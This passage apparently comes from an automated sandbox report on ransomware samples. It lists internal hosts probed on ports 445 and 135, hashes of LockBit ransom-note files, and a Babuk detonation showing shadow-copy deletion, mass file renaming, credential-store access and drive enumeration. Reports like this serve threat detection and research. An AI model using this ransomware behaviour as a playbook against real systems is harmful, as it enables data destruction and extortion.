N/A	10.127.0.168:445		tcp
N/A	10.127.0.145:445		tcp
N/A	10.127.0.132:445		tcp
N/A	10.127.0.144:445		tcp
N/A	10.127.0.174:445		tcp
N/A	10.127.0.166:445		tcp
N/A	10.127.0.139:445		tcp
N/A	10.127.0.180:445		tcp
N/A	10.127.0.158:445		tcp
N/A	10.127.0.152:445		tcp
N/A	10.127.0.134:445		tcp
N/A	10.127.0.186:445		tcp
N/A	10.127.0.131:445		tcp
N/A	10.127.0.161:445		tcp
N/A	10.127.0.141:445		tcp
N/A	10.127.0.176:445		tcp
N/A	10.127.0.150:445		tcp
N/A	10.127.0.143:445		tcp
N/A	10.127.0.170:445		tcp
N/A	10.127.0.172:445		tcp
N/A	10.127.0.163:445		tcp
N/A	10.127.0.175:445		tcp
N/A	10.127.0.19:445		tcp
N/A	10.127.0.142:445		tcp
N/A	10.127.0.133:445		tcp
N/A	10.127.0.146:445		tcp
N/A	10.127.0.179:445		tcp
N/A	10.127.0.181:445		tcp
N/A	10.127.0.165:445		tcp
N/A	10.127.0.140:445		tcp
N/A	10.127.0.129:445		tcp
N/A	10.127.0.184:445		tcp
N/A	10.127.0.183:445		tcp
N/A	10.127.0.167:445		tcp
N/A	10.127.0.20:445		tcp
N/A	10.127.0.177:445		tcp
N/A	10.127.0.173:445		tcp
N/A	10.127.0.136:445		tcp
N/A	10.127.0.154:445		tcp
N/A	10.127.0.147:445		tcp
N/A	10.127.0.185:445		tcp
N/A	10.127.0.153:445		tcp
N/A	10.127.0.137:445		tcp
N/A	10.127.0.156:445		tcp
N/A	10.127.0.164:445		tcp
N/A	10.127.0.148:445		tcp
N/A	10.127.0.169:445		tcp
N/A	10.127.0.138:445		tcp
N/A	10.127.0.155:445		tcp
N/A	10.127.0.135:445		tcp
N/A	10.127.0.127:445		tcp
N/A	10.127.0.178:445		tcp
N/A	10.127.0.149:445		tcp
N/A	10.127.0.121:445		tcp
N/A	10.127.0.118:445		tcp
N/A	10.127.0.95:445		tcp
N/A	10.127.0.107:445		tcp
N/A	10.127.0.98:445		tcp
N/A	10.127.0.79:445		tcp
N/A	10.127.0.100:445		tcp
N/A	10.127.0.105:445		tcp
N/A	10.127.0.103:445		tcp
N/A	10.127.0.108:445		tcp
N/A	10.127.0.93:445		tcp
N/A	10.127.0.123:445		tcp
N/A	10.127.0.87:445		tcp
N/A	10.127.0.66:445		tcp
N/A	10.127.0.125:445		tcp
N/A	10.127.0.119:445		tcp
N/A	10.127.0.88:445		tcp
N/A	10.127.0.82:445		tcp
N/A	10.127.0.67:445		tcp
N/A	10.127.0.75:445		tcp
N/A	10.127.0.99:445		tcp
N/A	10.127.0.85:445		tcp
N/A	10.127.0.73:445		tcp
N/A	10.127.0.62:445		tcp
N/A	10.127.0.117:445		tcp
N/A	10.127.0.112:445		tcp
N/A	10.127.0.91:445		tcp
N/A	10.127.0.64:445		tcp
N/A	10.127.0.113:445		tcp
N/A	10.127.0.74:445		tcp
N/A	10.127.0.70:445		tcp
N/A	10.127.0.97:445		tcp
N/A	10.127.0.71:445		tcp
N/A	10.127.0.84:445		tcp
N/A	10.127.0.104:445		tcp
N/A	10.127.0.110:445		tcp
N/A	10.127.0.122:445		tcp
N/A	10.127.0.86:445		tcp
N/A	10.127.0.68:445		tcp
N/A	10.127.0.120:445		tcp
N/A	10.127.0.63:445		tcp
N/A	10.127.0.115:445		tcp
N/A	10.127.0.72:445		tcp
N/A	10.127.0.65:445		tcp
N/A	10.127.0.124:445		tcp
N/A	10.127.0.101:445		tcp
N/A	10.127.0.76:445		tcp
N/A	10.127.0.111:445		tcp
N/A	10.127.0.109:445		tcp
N/A	10.127.0.80:445		tcp
N/A	10.127.0.96:445		tcp
N/A	10.127.0.106:445		tcp
N/A	10.127.0.102:445		tcp
N/A	10.127.0.77:445		tcp
N/A	10.127.0.78:445		tcp
N/A	10.127.0.94:445		tcp
N/A	10.127.0.90:445		tcp
N/A	10.127.0.89:445		tcp
N/A	10.127.0.81:445		tcp
N/A	10.127.0.69:445		tcp
N/A	10.127.0.114:445		tcp
N/A	10.127.0.92:445		tcp
N/A	10.127.0.116:445		tcp
N/A	10.127.0.83:445		tcp
N/A	10.127.0.126:445		tcp
N/A	10.127.0.57:445		tcp
N/A	10.127.0.39:445		tcp
N/A	10.127.0.15:445		tcp
N/A	10.127.0.52:445		tcp
N/A	10.127.0.56:445		tcp
N/A	10.127.0.53:445		tcp
N/A	10.127.0.10:445		tcp
N/A	10.127.0.2:445		tcp
N/A	10.127.0.50:445		tcp
N/A	10.127.0.18:445		tcp
N/A	10.127.0.43:445		tcp
N/A	10.127.0.8:445		tcp
N/A	10.127.0.54:445		tcp
N/A	10.127.0.41:445		tcp
N/A	10.127.0.4:445		tcp
N/A	10.127.0.7:445		tcp
N/A	10.127.0.29:445		tcp
N/A	10.127.0.51:445		tcp
N/A	10.127.0.33:445		tcp
N/A	10.127.0.44:445		tcp
N/A	10.127.0.40:445		tcp
N/A	10.127.0.11:445		tcp
N/A	10.127.0.60:445		tcp
N/A	10.127.0.35:445		tcp
N/A	10.127.0.22:445		tcp
N/A	10.127.0.58:445		tcp
N/A	10.127.0.17:445		tcp
N/A	10.127.0.61:445		tcp
N/A	10.127.0.46:445		tcp
N/A	10.127.0.23:445		tcp
N/A	10.127.0.48:445		tcp
N/A	10.127.0.36:445		tcp
N/A	10.127.0.37:445		tcp
N/A	10.127.0.47:445		tcp
N/A	10.127.0.13:445		tcp
N/A	10.127.0.26:445		tcp
N/A	10.127.0.34:445		tcp
N/A	10.127.0.12:445		tcp
N/A	10.127.0.16:445		tcp
N/A	10.127.0.55:445		tcp
N/A	10.127.0.25:445		tcp
N/A	10.127.0.28:445		tcp
N/A	10.127.0.30:445		tcp
N/A	10.127.0.24:445		tcp
N/A	10.127.0.3:445		tcp
N/A	10.127.0.0:445		tcp
N/A	10.127.0.21:445		tcp
N/A	10.127.0.45:445		tcp
N/A	10.127.0.14:445		tcp
N/A	10.127.0.38:445		tcp
N/A	10.127.0.27:445		tcp
N/A	10.127.0.5:445		tcp
N/A	10.127.0.42:445		tcp
N/A	10.127.0.49:445		tcp
N/A	10.127.0.31:445		tcp
N/A	10.127.0.59:445		tcp
N/A	10.127.0.32:445		tcp
N/A	10.127.0.9:445		tcp
N/A	10.127.0.252:135		tcp
N/A	10.127.0.201:135		tcp
N/A	10.127.0.232:135		tcp
N/A	10.127.0.202:135		tcp
N/A	10.127.0.234:135		tcp
N/A	10.127.0.203:135		tcp
N/A	10.127.0.235:135		tcp
N/A	10.127.0.204:135		tcp
N/A	10.127.0.236:135		tcp
N/A	10.127.0.207:135		tcp
N/A	10.127.0.237:135		tcp
N/A	10.127.0.205:135		tcp
N/A	10.127.0.238:135		tcp
N/A	10.127.0.206:135		tcp
N/A	10.127.0.239:135		tcp
N/A	10.127.0.208:135		tcp
N/A	10.127.0.240:135		tcp
N/A	10.127.0.209:135		tcp
N/A	10.127.0.241:135		tcp
N/A	10.127.0.210:135		tcp
N/A	10.127.0.242:135		tcp
N/A	10.127.0.211:135		tcp
N/A	10.127.0.243:135		tcp
N/A	10.127.0.213:135		tcp
N/A	10.127.0.214:135		tcp
N/A	10.127.0.215:135		tcp
N/A	10.127.0.216:135		tcp
N/A	10.127.0.217:135		tcp
N/A	10.127.0.218:135		tcp
N/A	10.127.0.219:135		tcp
N/A	10.127.0.233:135		tcp
N/A	10.127.0.220:135		tcp
N/A	10.127.0.221:135		tcp
N/A	10.127.0.222:135		tcp
N/A	10.127.0.223:135		tcp
N/A	10.127.0.224:135		tcp
N/A	10.127.0.225:135		tcp
N/A	10.127.0.226:135		tcp
N/A	10.127.0.227:135		tcp
N/A	10.127.0.228:135		tcp
N/A	10.127.0.229:135		tcp
N/A	10.127.0.230:135		tcp
N/A	10.127.0.231:135		tcp
N/A	10.127.0.212:135		tcp
N/A	10.127.0.254:135		tcp
N/A	10.127.0.245:135		tcp
N/A	10.127.0.244:135		tcp
N/A	10.127.0.246:135		tcp
N/A	10.127.0.247:135		tcp
N/A	10.127.0.248:135		tcp
N/A	10.127.0.249:135		tcp
N/A	10.127.0.250:135		tcp
N/A	10.127.0.251:135		tcp
N/A	10.127.0.253:135		tcp
N/A	10.127.0.195:135		tcp
N/A	10.127.0.196:135		tcp
N/A	10.127.0.197:135		tcp
N/A	10.127.0.198:135		tcp
N/A	10.127.0.165:135		tcp
N/A	10.127.0.166:135		tcp
N/A	10.127.0.167:135		tcp
N/A	10.127.0.168:135		tcp
N/A	10.127.0.199:135		tcp
N/A	10.127.0.200:135		tcp
N/A	10.127.0.152:135		tcp
N/A	10.127.0.153:135		tcp
N/A	10.127.0.154:135		tcp
N/A	10.127.0.155:135		tcp
N/A	10.127.0.156:135		tcp
N/A	10.127.0.157:135		tcp
N/A	10.127.0.194:135		tcp
N/A	10.127.0.170:135		tcp
N/A	10.127.0.171:135		tcp
N/A	10.127.0.172:135		tcp
N/A	10.127.0.173:135		tcp
N/A	10.127.0.174:135		tcp
N/A	10.127.0.175:135		tcp
N/A	10.127.0.176:135		tcp
N/A	10.127.0.177:135		tcp
N/A	10.127.0.178:135		tcp
N/A	10.127.0.179:135		tcp
N/A	10.127.0.180:135		tcp
N/A	10.127.0.181:135		tcp
N/A	10.127.0.169:135		tcp
N/A	10.127.0.183:135		tcp
N/A	10.127.0.182:135		tcp
N/A	10.127.0.184:135		tcp
N/A	10.127.0.185:135		tcp
N/A	10.127.0.186:135		tcp
N/A	10.127.0.188:135		tcp
N/A	10.127.0.189:135		tcp
N/A	10.127.0.190:135		tcp
N/A	10.127.0.191:135		tcp
N/A	10.127.0.192:135		tcp
N/A	10.127.0.193:135		tcp
N/A	10.127.0.145:135		tcp
N/A	10.127.0.146:135		tcp
N/A	10.127.0.147:135		tcp
N/A	10.127.0.148:135		tcp
N/A	10.127.0.149:135		tcp
N/A	10.127.0.187:135		tcp
N/A	10.127.0.150:135		tcp
N/A	10.127.0.158:135		tcp
N/A	10.127.0.161:135		tcp
N/A	10.127.0.159:135		tcp
N/A	10.127.0.160:135		tcp
N/A	10.127.0.162:135		tcp
N/A	10.127.0.163:135		tcp
N/A	10.127.0.122:135		tcp
N/A	10.127.0.123:135		tcp
N/A	10.127.0.124:135		tcp
N/A	10.127.0.125:135		tcp
N/A	10.127.0.126:135		tcp
N/A	10.127.0.127:135		tcp
N/A	10.127.0.129:135		tcp
N/A	10.127.0.130:135		tcp
N/A	10.127.0.131:135		tcp
N/A	10.127.0.132:135		tcp
N/A	10.127.0.133:135		tcp
N/A	10.127.0.134:135		tcp
N/A	10.127.0.135:135		tcp
N/A	10.127.0.136:135		tcp
N/A	10.127.0.137:135		tcp
N/A	10.127.0.138:135		tcp
N/A	10.127.0.139:135		tcp
N/A	10.127.0.140:135		tcp
N/A	10.127.0.141:135		tcp
N/A	10.127.0.142:135		tcp
N/A	10.127.0.143:135		tcp
N/A	10.127.0.144:135		tcp
N/A	10.127.0.151:135		tcp
N/A	10.127.0.164:135		tcp
N/A	10.127.0.109:135		tcp
N/A	10.127.0.110:135		tcp
N/A	10.127.0.111:135		tcp
N/A	10.127.0.112:135		tcp
N/A	10.127.0.113:135		tcp
N/A	10.127.0.117:135		tcp
N/A	10.127.0.118:135		tcp
N/A	10.127.0.119:135		tcp
N/A	10.127.0.120:135		tcp
N/A	10.127.0.121:135		tcp
N/A	10.127.0.104:135		tcp
N/A	10.127.0.105:135		tcp
N/A	10.127.0.106:135		tcp
N/A	10.127.0.107:135		tcp
N/A	10.127.0.114:135		tcp
N/A	10.127.0.115:135		tcp
N/A	10.127.0.116:135		tcp
N/A	10.127.0.71:135		tcp
N/A	10.127.0.89:135		tcp
N/A	10.127.0.103:135		tcp
N/A	10.127.0.108:135		tcp
N/A	10.127.0.88:135		tcp
N/A	10.127.0.86:135		tcp
N/A	10.127.0.85:135		tcp
N/A	10.127.0.80:135		tcp
N/A	10.127.0.77:135		tcp
N/A	10.127.0.76:135		tcp
N/A	10.127.0.75:135		tcp
N/A	10.127.0.67:135		tcp
N/A	10.127.0.65:135		tcp
N/A	10.127.0.62:135		tcp
N/A	10.127.0.59:135		tcp
N/A	10.127.0.57:135		tcp
N/A	10.127.0.54:135		tcp
N/A	10.127.0.51:135		tcp
N/A	10.127.0.48:135		tcp
N/A	10.127.0.45:135		tcp
N/A	10.127.0.41:135		tcp
N/A	10.127.0.38:135		tcp
N/A	10.127.0.37:135		tcp
N/A	10.127.0.94:135		tcp
N/A	10.127.0.95:135		tcp
N/A	10.127.0.96:135		tcp
N/A	10.127.0.97:135		tcp
N/A	10.127.0.98:135		tcp
N/A	10.127.0.99:135		tcp
N/A	10.127.0.100:135		tcp
N/A	10.127.0.101:135		tcp
N/A	10.127.0.102:135		tcp
N/A	10.127.0.91:135		tcp
N/A	10.127.0.92:135		tcp
N/A	10.127.0.93:135		tcp
N/A	10.127.0.90:135		tcp
N/A	10.127.0.87:135		tcp
N/A	10.127.0.84:135		tcp
N/A	10.127.0.83:135		tcp
N/A	10.127.0.82:135		tcp
N/A	10.127.0.81:135		tcp
N/A	10.127.0.79:135		tcp
N/A	10.127.0.78:135		tcp
N/A	10.127.0.74:135		tcp
N/A	10.127.0.73:135		tcp
N/A	10.127.0.72:135		tcp
N/A	10.127.0.70:135		tcp
N/A	10.127.0.69:135		tcp
N/A	10.127.0.68:135		tcp
N/A	10.127.0.66:135		tcp
N/A	10.127.0.64:135		tcp
N/A	10.127.0.63:135		tcp
N/A	10.127.0.61:135		tcp
N/A	10.127.0.60:135		tcp
N/A	10.127.0.58:135		tcp
N/A	10.127.0.56:135		tcp
N/A	10.127.0.55:135		tcp
N/A	10.127.0.53:135		tcp
N/A	10.127.0.52:135		tcp
N/A	10.127.0.50:135		tcp
N/A	10.127.0.47:135		tcp
N/A	10.127.0.46:135		tcp
N/A	10.127.0.44:135		tcp
N/A	10.127.0.43:135		tcp
N/A	10.127.0.42:135		tcp
N/A	10.127.0.40:135		tcp
N/A	10.127.0.39:135		tcp
N/A	10.127.0.49:135		tcp
N/A	10.127.0.29:135		tcp
N/A	10.127.0.31:135		tcp
N/A	10.127.0.30:135		tcp
N/A	10.127.0.6:135		tcp
N/A	10.127.0.9:135		tcp
N/A	10.127.0.11:135		tcp
N/A	10.127.0.12:135		tcp
N/A	10.127.0.13:135		tcp
N/A	10.127.0.14:135		tcp
N/A	10.127.0.17:135		tcp
N/A	10.127.0.18:135		tcp
N/A	10.127.0.19:135		tcp
N/A	10.127.0.20:135		tcp
N/A	10.127.0.21:135		tcp
N/A	10.127.0.22:135		tcp
N/A	10.127.0.23:135		tcp
N/A	10.127.0.24:135		tcp
N/A	10.127.0.25:135		tcp
N/A	10.127.0.26:135		tcp
N/A	10.127.0.27:135		tcp
N/A	10.127.0.28:135		tcp
N/A	10.127.0.33:135		tcp
N/A	10.127.0.34:135		tcp
N/A	10.127.0.35:135		tcp
N/A	10.127.0.1:135		tcp
N/A	10.127.0.2:135		tcp
N/A	10.127.0.3:135		tcp
N/A	10.127.0.4:135		tcp
N/A	10.127.0.5:135		tcp
N/A	10.127.0.7:135		tcp
N/A	10.127.0.8:135		tcp
N/A	10.127.0.10:135		tcp
N/A	10.127.0.15:135		tcp
N/A	10.127.0.16:135		tcp
N/A	10.127.0.32:135		tcp
N/A	10.127.0.36:135		tcp
N/A	10.127.0.0:135		tcp

Files

C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt

MD5	a8a6fdbbbb8bd3128b0dd266dc398f2b
SHA1	f53836032a882552dfa46d2a99a86850f6451b26
SHA256	61afe8b4d30f2db46c0b198c2eee72ad1e21525676c686d433a6b95e0a147f42
SHA512	7b9c4d314e6b48ca060b8a4596070cd137dcc25a2f86b3c1efeb8ebd2618e8c1b8171e0afd6a1a2db29535d31a6d34e033db2a37b2faca15fb2effed4ac99d6a

C:\Users\Admin\Desktop\LockBit-note.hta

MD5	fd5d9cf71540fae159317cfa3f72f98a
SHA1	0e02c08d660680aa59047d2c794c4801f066f51a
SHA256	d67a1ee5d0bc52cfc70b1cc262da2857dc907904fd9b5a504eefb2e61fdfbd90
SHA512	9236ec9162f89fafc60a998099df36da5e2da396ea452373c81d0caf8ac6be1c3f7580ee7967fb9fb7f6bc19d6ffa051f55a2fe36d4108ea8e97142c06915d62

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

122s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (478) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description	Indicator	Process	Target
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Restore Your Files.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Enumerates connected drives

Description	Indicator	Process	Target
File opened (read-only)	\??\I:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\G:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\J:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\K:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\Z:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\Y:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\H:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\L:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\M:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\Q:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\W:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\U:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\O:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\V:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\B:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\N:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\E:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\R:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\T:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\P:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\A:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\S:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
File opened (read-only)	\??\X:	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2580 wrote to memory of 2404	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2404	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2404	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 2404	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe	C:\Windows\System32\cmd.exe
PID 2404 wrote to memory of 592	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2404 wrote to memory of 592	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 2404 wrote to memory of 592	N/A	C:\Windows\System32\cmd.exe	C:\Windows\system32\vssadmin.exe
